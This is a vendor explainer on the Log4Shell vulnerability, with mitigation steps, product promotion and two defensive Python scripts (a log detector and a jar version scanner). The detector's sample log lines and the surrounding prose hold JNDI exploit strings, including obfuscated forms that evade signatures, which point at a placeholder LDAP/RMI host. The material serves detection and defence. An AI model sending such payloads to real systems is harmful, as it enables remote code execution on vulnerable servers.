Why Is a Log4Shell Exploit Considered a Serious Risk to Enterprises?
Apache Log4j is embedded in thousands of enterprise applications across the stack, including appliances with a web interface, and in many Java-based OT/ICS hardware and software components. Large numbers of Java-based IoT devices and networking appliances may also be susceptible. Every Log4j 2.x release from 2.0-beta9 through 2.14.1 is affected by Log4Shell (CVE-2021-44228). Many of the affected systems are internal to enterprise networks, so APTs and attackers who are already inside the network can exploit them to move laterally.
The vulnerability is severe enough for CISA, FBI, and NSA to release a joint Advisory stating “Log4j vulnerabilities present a severe and ongoing threat to organizations and governments around the world; we implore all entities to take immediate action to implement the latest mitigation guidance to protect their networks.”
Successful exploitation of Log4Shell on a system can enable the threat actor to take full control of the system.
Mass scanning by threat actors to identify vulnerable systems is ongoing. In addition, botnets like Mirai, remote access toolkits, and reverse-shell payloads such as Meterpreter have been adapted to leverage the Log4Shell vulnerability. Threat actors are also finding new ways to use the vulnerability, for example by exploiting internal enterprise systems and using them as a foothold for post-exploitation activity.
Patching vulnerable Log4j versions across all affected systems and applications will take a long time, and patching may not be possible at all for certain embedded systems. Detection methods that match the literal string ${jndi: in requests are easy to evade: attackers nest Log4j lookups (for example ${${lower:j}ndi:...} or ${${::-j}ndi:...}) so that the signature never appears in the raw request even though Log4j resolves it to the same JNDI lookup.
What Can IT Security Teams Do to Protect Against Log4Shell Exploits?
To protect against Log4Shell attack attempts, IT Security teams should apply the patches released by the Apache Software Foundation and by the vendors of software and hardware that are affected by the Log4Shell vulnerability. For systems that cannot be patched and for systems for which patches will take a while to be released, IT Security teams should follow the IMMA approach:
(I)solate: This step involves segregating the vulnerable systems to reduce pathways from those systems to other parts of the network.
(M)inimize: This step refers to minimizing the attack surface that an attacker can use to reach vulnerable systems. This can be done by, for example, disabling unnecessary services or reducing privileges.
(M)onitor: This step involves closely watching system logs and network traffic for signs of a Log4Shell exploit attempt.
(A)ctive Defense: This step involves implementing measures like using deception technology to detect attackers and deflect them away from vulnerable systems.
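The (M)onitor step above only works if the log review sees through the payload obfuscation described earlier. The following detector is an added example, not code from the original page or from Acalvio: it statically resolves the nesting rules of Log4j 2.x lookups (lower:/upper: transforms, the :- default-value syntax behind ${::-j} and ${env:UNSET:-j}, and the quoted-literal trick ${date:'j'}) before looking for a JNDI lookup, and runs over a few constructed web-server access-log lines (the IPs, paths and hostnames are made up).

```python
import re

# Log4j 2.x resolves ${...} lookups innermost-first, so an attacker can hide the
# string "jndi" behind nested lookups that a naive "${jndi:" signature never sees.
# This detector evaluates the same nesting statically, then checks the result.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")      # a lookup with no lookup inside it
JNDI_RAW = re.compile(r"\$\{jndi:([^}]*)", re.I)  # fallback for lookups we could not collapse
_JNDI_MARK = "\x00JNDI\x00"   # placeholder so a resolved ${jndi:...} is not re-evaluated


def _evaluate(body, hits):
    """Resolve one innermost lookup body (the text between ${ and }) the way Log4j
    would when the analyst has no access to the target's real environment."""
    # ':-' separates a lookup from its default value; an unresolvable lookup
    # (unset env var, or the empty name in ${::-j}) falls back to the default.
    if ":-" in body:
        lookup, default = body.split(":-", 1)
    else:
        lookup, default = body, None
    prefix, _, key = lookup.partition(":")
    prefix = prefix.lower()                      # lookup names are case-insensitive
    if prefix == "jndi":
        hits.append(key)                         # record the payload and freeze it
        return _JNDI_MARK + key + "}"
    if prefix == "lower":
        return key.lower()
    if prefix == "upper":
        return key.upper()
    if prefix == "date" and len(key) >= 2 and key[0] == key[-1] == "'":
        return key[1:-1]                         # ${date:'j'} yields the quoted literal
    if default is not None:
        return default
    return ""   # unknown lookup, no default: Log4j keeps the literal; dropping it errs toward flagging


def normalize(text, max_rounds=32):
    """Collapse nested lookups until nothing changes (bounded so crafted input
    cannot loop the detector). Returns (normalized text, list of JNDI keys seen)."""
    hits = []
    for _ in range(max_rounds):
        resolved = INNERMOST.sub(lambda m: _evaluate(m.group(1), hits), text)
        if resolved == text:
            break
        text = resolved
    hits.extend(m.group(1) for m in JNDI_RAW.finditer(text))   # anything left unresolved
    return text.replace(_JNDI_MARK, "${jndi:"), hits


def scan_log(lines):
    """Return one finding per log line that carries a JNDI lookup after normalisation."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        if "${" not in line:                     # cheap pre-filter: every lookup needs this opener
            continue
        normalized, hits = normalize(line)
        if hits:
            findings.append({"line": lineno,
                             "scheme": hits[0].partition(":")[0].lower(),
                             "normalized": normalized})
    return findings


# Constructed sample access-log lines (not real traffic): plain request, a literal
# payload, two obfuscated payloads, and a non-JNDI lookup probe that must not fire.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Dec/2021:10:02:31 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [11/Dec/2021:10:02:45 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.9:1389/a}"',
    '203.0.113.8 - - [11/Dec/2021:10:03:02 +0000] "GET /login HTTP/1.1" 200 612 "-" '
    '"${${lower:j}${upper:n}${::-d}${env:NOPE:-i}:ldap://198.51.100.9:1389/a}"',
    '203.0.113.9 - - [11/Dec/2021:10:03:20 +0000] "GET /api HTTP/1.1" 404 0 "-" '
    '"${${date:\'j\'}ndi:${lower:RMI}://198.51.100.9:1099/x}"',
    '203.0.113.10 - - [11/Dec/2021:10:04:00 +0000] "GET /?q=${java:version} HTTP/1.1" 200 5 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"line {finding['line']}: {finding['scheme']} lookup -> {finding['normalized']}")
```

Run it against real access, application or WAF logs by replacing SAMPLE_LOG with the file's lines; the normalised form is what should go into the alert, since it is also the value that Log4j would have handed to the JNDI lookup. The last sample line (${java:version}) is deliberately not flagged as Log4Shell, but a non-JNDI lookup arriving from the internet is still a probe worth logging.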
What Capabilities Does Acalvio ShadowPlex Provide to Counter the Log4Shell Vulnerability?
Acalvio ShadowPlex provides the following Active Defense capabilities to effectively counter the Log4Shell vulnerability:
1. Gain visibility into Log4Shell vulnerable assets
2. Actively protect Log4Shell vulnerable assets
3. Generate Threat Intelligence
Visibility
The first step in combating the Log4Shell vulnerability is to gain visibility into affected systems. Acalvio ShadowPlex provides a reliable, safe, and easy-to-deploy capability to automatically discover Log4Shell vulnerable assets across IT, Cloud, IoT, and OT environments. A single click from the ShadowPlex Admin Console will discover the Log4Shell vulnerable assets. There are no scripts to run manually, and no cloud services are required for the setup.
Unlike traditional vulnerability scanners, Acalvio ShadowPlex does not require access to the asset’s filesystem. The Acalvio approach works for any kind of remote service, device, or application without requiring any special asset access, firewall changes, or sensitive login credentials.
Asset Protection
Most vendors need time to create and test Log4Shell vulnerability patches. Also, application of patches can be very challenging in many mission-critical environments such as OT/ICS networks. Acalvio ShadowPlex provides the ability to leverage deception deployment on and around vulnerable assets to quickly detect Log4Shell exploit attempts.
A malicious actor needs to attempt an exploit to determine whether a system is vulnerable. This provides an excellent opportunity to leverage Acalvio’s active defense and just-in-time deception platform to detect and respond to exploit attempts from inside the organization’s IT, OT, IoT, and Cloud environments.
Generate Threat Intelligence
The Acalvio ShadowPlex platform can be leveraged to generate Threat Intelligence (TI) using deception technology. This TI is specific to Log4Shell exploits and covers new obfuscation techniques and attacker-controlled IPs that can be blocked. This TI can be very useful for MDR solutions, and large enterprises to get ahead of Log4Shell exploit attempts.
Frequently Asked Questions
Is Log4Shell still a threat?
Yes, IT Security teams still consider Log4Shell a threat. Researchers have noticed a steady stream of attacks attempting to exploit the Log4j vulnerability. At the same time, several attacks that leverage Log4Shell may be going unnoticed.
What is vulnerable to Log4Shell?
The Log4Shell vulnerability primarily affects systems that use the Apache Log4j library. Here are some types of systems that could be vulnerable:
- Servers and Web-based Applications: These are the most exposed systems, because they routinely log attacker-supplied input (HTTP headers such as User-Agent, usernames, search strings) through the Log4j library.
- IT Systems: IT systems that use software applications and online services incorporating the Log4j library are at risk.
- OT Systems: Operational Technology (OT) systems such as SCADA (Supervisory Control and Data Acquisition) systems and IoT (Internet-of-Things) devices are also at risk.
Does Log4Shell affect personal computers?
Personal computers, laptops, and mobile devices may be running software that includes the Log4j library, but the exploit requires the vulnerable process to log attacker-controlled input, which is typical of server-like processes rather than desktop applications. There are exceptions: a PC running a Java environment with a vulnerable application, or an unpatched Minecraft Java Edition client, which logs chat messages sent by other players, could be affected.
What are the steps for Log4Shell detection on my system?
To determine if your system is affected by the Log4Shell vulnerability, you can follow these general steps:
- Identify Usage of Log4j: Check if your applications or services are using the Apache Log4j library. This can be done by reviewing the application’s dependencies (including transitive dependencies and vendor-supplied bundles such as WAR, EAR, and fat JAR files) or by performing a software composition analysis.
- Check the Version: The vulnerability (CVE-2021-44228) affects Apache Log4j 2 versions 2.0-beta9 through 2.14.1. The first fix, 2.15.0, was itself found to be incomplete (CVE-2021-45046), so upgrade to 2.17.1 or later (2.12.4 for Java 7, 2.3.2 for Java 6). Log4j 1.x is not affected by this CVE but is end-of-life and should be replaced.
- Scan for Vulnerabilities: Acalvio ShadowPlex provides capabilities that enable a Security team to gain visibility into applications and services that carry the Log4Shell vulnerability. For more information, see Visibility.
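The first two steps above (find every copy of log4j-core, read its version) can be automated on a host you can log into. The script below is an added example and is not part of the original page or of Acalvio ShadowPlex; it walks a directory tree, descends into nested archives (a log4j-core jar inside a vendor jar inside a WAR), reads the version from the Maven pom.properties that log4j-core ships, notes whether JndiLookup.class is still present (the Apache-documented removal mitigation for older 2.x releases), and classifies the result against the version ranges given above. The WAR it scans when run without arguments is a constructed fixture built in memory, not a real application.

```python
import io
import os
import re
import sys
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
FIXED_BACKPORTS = {"2.3.1", "2.3.2", "2.12.2", "2.12.3", "2.12.4"}  # Java 6 / Java 7 security releases
VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?$", re.I)
STAGE_RANK = {"alpha": 0, "beta": 1, "rc": 2}   # pre-releases sort before the final release (rank 3)


def parse_version(text):
    """'2.0-beta9' -> (2, 0, 0, 1, 9); '2.14.1' -> (2, 14, 1, 3, 0). Tuples compare like Maven versions."""
    m = VERSION_RE.match(text.strip())
    if not m:
        return None
    major, minor, patch, stage, num = m.groups()
    return (int(major), int(minor), int(patch or 0), STAGE_RANK[stage.lower()] if stage else 3, int(num or 0))


def assess(version, has_jndi_class):
    """Classify a log4j-core version against CVE-2021-44228 and its follow-up fixes."""
    v = parse_version(version) if version else None
    if v is None:
        return "UNKNOWN-VERSION" + (" (JndiLookup present, shaded jar?)" if has_jndi_class else "")
    if v < parse_version("2.0-beta9"):
        return "NOT-AFFECTED"                    # Log4j 1.x is out of scope for this CVE
    if version in FIXED_BACKPORTS:
        return "FIXED"
    if v <= parse_version("2.14.1"):
        if not has_jndi_class:
            return "MITIGATED (JndiLookup.class removed)"
        return "VULNERABLE (CVE-2021-44228)"
    if v <= parse_version("2.16.0"):             # 2.15.0: CVE-2021-45046; 2.16.0: CVE-2021-45105
        return "PARTIAL-FIX (upgrade to 2.17.1 or later)"
    return "FIXED"


def pom_version(props_text):
    for line in props_text.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip() == "version":
            return value.strip()
    return None


def scan_archive(data, path, findings=None):
    """Inspect an archive held in memory and recurse into any archives nested in it."""
    findings = [] if findings is None else findings
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    names = sorted(zf.namelist())
    has_jndi = JNDI_CLASS in names
    if POM_PROPS in names:
        version = pom_version(zf.read(POM_PROPS).decode("utf-8", "replace"))
        findings.append((path, version, assess(version, has_jndi)))
    elif has_jndi:                               # repackaged jar without Maven metadata
        findings.append((path, None, assess(None, True)))
    for name in names:
        if name.lower().endswith(ARCHIVE_EXT):
            scan_archive(zf.read(name), f"{path}!{name}", findings)
    return findings


def scan_tree(root):
    """Walk a directory and scan every archive below it."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for filename in files:
            if filename.lower().endswith(ARCHIVE_EXT):
                full = os.path.join(dirpath, filename)
                with open(full, "rb") as fh:
                    scan_archive(fh.read(), full, findings)
    return findings


def _zip_bytes(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def build_sample_war():
    """Constructed fixture, not a real build: a WAR with three log4j-core jars, one nested in a vendor bundle."""
    def log4j_core(version, keep_jndi=True):
        entries = {POM_PROPS: f"version={version}\nartifactId=log4j-core\n"}
        if keep_jndi:
            entries[JNDI_CLASS] = b"\xca\xfe\xba\xbe"   # stand-in bytes, not a real class file
        return _zip_bytes(entries)
    return _zip_bytes({
        "WEB-INF/lib/log4j-core-2.14.1.jar": log4j_core("2.14.1"),
        "WEB-INF/lib/log4j-core-2.17.1.jar": log4j_core("2.17.1"),
        "WEB-INF/lib/vendor-bundle.jar": _zip_bytes({"lib/log4j-core-2.13.3.jar": log4j_core("2.13.3", keep_jndi=False)}),
    })


if __name__ == "__main__":
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else scan_archive(build_sample_war(), "app.war")
    for path, version, status in results:
        print(f"{status:45} {version or '?':10} {path}")
```

Point it at an application directory (python scan.py /opt/app) to scan a real host. A jar that has been shaded or relocated may carry JndiLookup.class under a different package path and no pom.properties, so treat an empty result on a host you know runs Java as a reason to confirm with a software composition analysis tool rather than as a clean bill of health.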
Are there any examples of Log4Shell exploits?
The following are some Log4Shell exploit examples:
- Malware Exploitation: Malware families such as BazarLoader and Mirai, as well as various cryptocurrency-mining payloads, have been observed exploiting Log4Shell.
- Spring Boot Web Application: A sample vulnerable Spring Boot web application was created to demonstrate how Log4Shell can be exploited. The exploitation process uses an attacker-controlled malicious LDAP server and a curl request that places the ${jndi:ldap://...} lookup string in an input the application logs.
- Minecraft PoC: A proof of concept (PoC) was demonstrated using Minecraft, which is known to use the Log4j library.
How can I detect Log4Shell attacks?
Deception technology powered by Acalvio ShadowPlex is an effective way of detecting Log4Shell attacks. For more information, see Asset Protection.